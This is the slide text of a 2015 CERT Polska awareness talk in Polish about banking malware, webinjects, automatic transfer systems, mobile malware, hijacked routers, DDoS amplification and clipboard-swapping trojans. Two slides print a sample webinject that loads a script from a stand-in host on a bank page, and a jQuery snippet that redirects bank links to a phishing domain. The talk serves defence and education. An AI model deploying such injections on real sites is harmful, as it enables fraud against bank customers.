<cyber> Zagrożenia </cyber> Wszystko, co chcielibyście wiedzieć o bezpieczeństwie w sieci a boicie się zapytać Radosław Żuber - NASK / CERT Polska Krajowa Izba Gospodarcza - 29/10/2015
O CERT Polska Działamy w strukturach Naukowej i Akademickiej Sieci Komputerowej (NASK) Do głównych zadań należy: rejestrowanie i obsługa zdarzeń naruszających bezpieczeństwo sieci aktywne reagowanie w przypadku wystąpienia bezpośrednich zagrożeń dla użytkowników współpraca z innymi zespołami CERT w Polsce i na świecie prowadzenie działań zmierzających do wzrostu świadomości dotyczącej bezpieczeństwa teleinformatycznego działalność badawcza z zakresu metod wykrywania incydentów bezpieczeństwa, analizy złośliwego oprogramowania i systemów wymiany informacji o zagrożeniach rozwijanie własnych narzędzi do wykrywania, monitorowania, analizy i korelacji zagrożeń www.cert.pl/o-nas 3/65
Źródło: krebsonsecurity.com 4/65
Boty w Polsce w lutym 2015 5/65
Boty w Polsce w październiku 2015 6/65
Jak ukraść 10 milionów?
Pozyskujemy malware 8/65
Dostarczamy malware 9/65
Dostarczamy malware 10/65
Dostarczamy malware 11/65
Dostarczamy malware 12/65
Dostarczamy malware 13/65
Zarządzamy - VMZeus 14/65
Zarządzamy - VMZeus 15/65
Zarządzamy - VMZeus 16/65
Zarządzamy - VMZeus 17/65
Zarządzamy - Tinba 18/65
Zarządzamy - Andromeda 19/65
Man in the Browser
Man in the Browser 21/65
Man in the Browser 22/65
Automatic Transfer System 23/65
az7 Home Banks Holders Drops Dropovods Transactions Logs Statistics Logout User: coder Now: 2013-05-16 08:46:37 LOC-2150903 Country Name Acounts Comments CZ BANK1 157 webinjects.txt CZ BANK2 0 webinjects.txt PL BANK3 0 webinjects.txt PL BANK4 396 webinjects.txt PL BANK5 0 webinjects.txt 24/65
rbaatsengine 25/65
rbaatsengine 26/65
rbaatsengine 27/65
Przystępujemy do działania
Webinject! <script id="inj_lib" src="http://evil.server/lib.js"></script> JAVASCRIPT Target URL: "*/nasz.internetowy.bank/*" data_before <head*> data_end data_inject <script id="inj_lib" src="http://evil.server/lib.js"></script> data_end data_after data_end WEBINJECT 29/65
Wyświetlany komunikat (pisownia oryginalna) Ze wzgledu na wzrastajaca ilosc wystepowania nieuczciwych transakcji z rachunkow klientow wszystkie platnosci przez Internet bankowy podlegaja ubezpieczeniu. kwoty platnosci do 300000 zl - bezoplatnie kwoty platnosci ponad 300000zl - 50 zl. 30/65
Wyświetlany komunikat 31/65
Wyświetlany komunikat 32/65
Zainfekujmy smartfona
Możliwości get info znak sterujący #, numer tel. gdzieś w wiadomości new number znak sterujący /, numer tel. gdzieś w wiadomości n znak sterujący, uninstall znak sterujący! +34 668 809 167 35/65
Wątek hiszpański fonyou.es 36/65
Hacked router
Złośliwe resolvery
Doniesienia o lukach... Źródła: zaufanatrzeciastrona.pl niebezpiecznik.pl sekurak.pl 40/65
Następstwa luk... Źródła: zaufanatrzeciastrona.pl niebezpiecznik.pl sekurak.pl 41/65
Jak to działa? 42/65
Jak to działa? 43/65
Dołączony kod na końcu strony <script> JAVASCRIPT jquery(document).ready(function() { jquery('a[href*="ebgz.pl"]').attr('href','http://ssl-.ebgz.pl/'); jquery('li p a.button.green').attr('href','http://ssl-.ebgz.pl/'); }); </script> 44/65
Jak to wygląda po drugiej stronie?
Jak to wygląda po drugiej stronie? 50/65
Infrastruktura "open"
Protokoły umożliwiające wzmocnienie ataku DDoS Protocol Bandwidth Ampli cation Factor Vulnerable Command DNS 28 to 54 see: TA13-088A [4] NTP 556.9 see: TA14-013A [5] SNMPv2 6.3 GetBulk request NetBIOS 3.8 Name resolution SSDP 30.8 SEARCH request CharGEN 358.8 Character generation request QOTD 140.3 Quote request BitTorrent 3.8 File search Źródło: US CERT 52/65
Protokoły umożliwiające wzmocnienie ataku DDoS Protocol Bandwidth Ampli cation Factor Vulnerable Command Kad 16.3 Peer list exchange Quake Network Protocol 63.9 Server info exchange Steam Protocol 5.5 Server info exchange Multicast DNS (mdns) 2 to 10 Unicast query RIPv1 131.24 Malformed request Portmap (RPCbind) 7 to 28 Malformed request Źródło: US CERT 53/65
54/65
Polskie wynalazki
VBKlip Pierwsze doniesienia w październiku 2013 Funkcjonalność keylogera Przesyłanie logów mailem Podmiania "w schowku" 26 cyfr (również w określonym formacie) na inne 26 cyfr Pobieranie numerów kont słupów z serwera C&C Uruchamiał się również po restarcie systemu VB malware replaces copied bank account number 56/65
VBKlip.B Styczeń 2014 Napisany w.net Numer konta zapisany w złośliwym oprogramowaniu Nie potra ł "przeżyć" restartu systemu 57/65
Banatrix 58/65
Backspacetrix Odkryty pod koniec 2014 roku Ten sam autor co VBKlip.B Napisany w.net Brak komunikacji z C&C - numer konta zapisany w złośliwym oprogramowaniu Logowanie wciśniętych klawiszy i jeśli było wpisanych 26 cyfr (nie licząc białych znaków) - symulowanie odpowiedniej liczby wciśniętych klawiszy shift i backspace 59/65
VBKlip.AHK Napisany w AutoHotKey Podmiana ("w schowku") numerów kont lub adresów bitcoinowych Ten sam autor co VBKlip.B 60/65
n6 network security incident exchange
n6 ponad 600 tys. nowych zdarzeń dziennie dostęp całkowicie bezpłatny 62/65
n6 - dołącz do nas Twoje dane już tu są ;-) n6.cert.pl 63/65
<Thank You!> info@cert.pl www.cert.pl secure.edu.pl/warsztaty cert.pl/szkolenia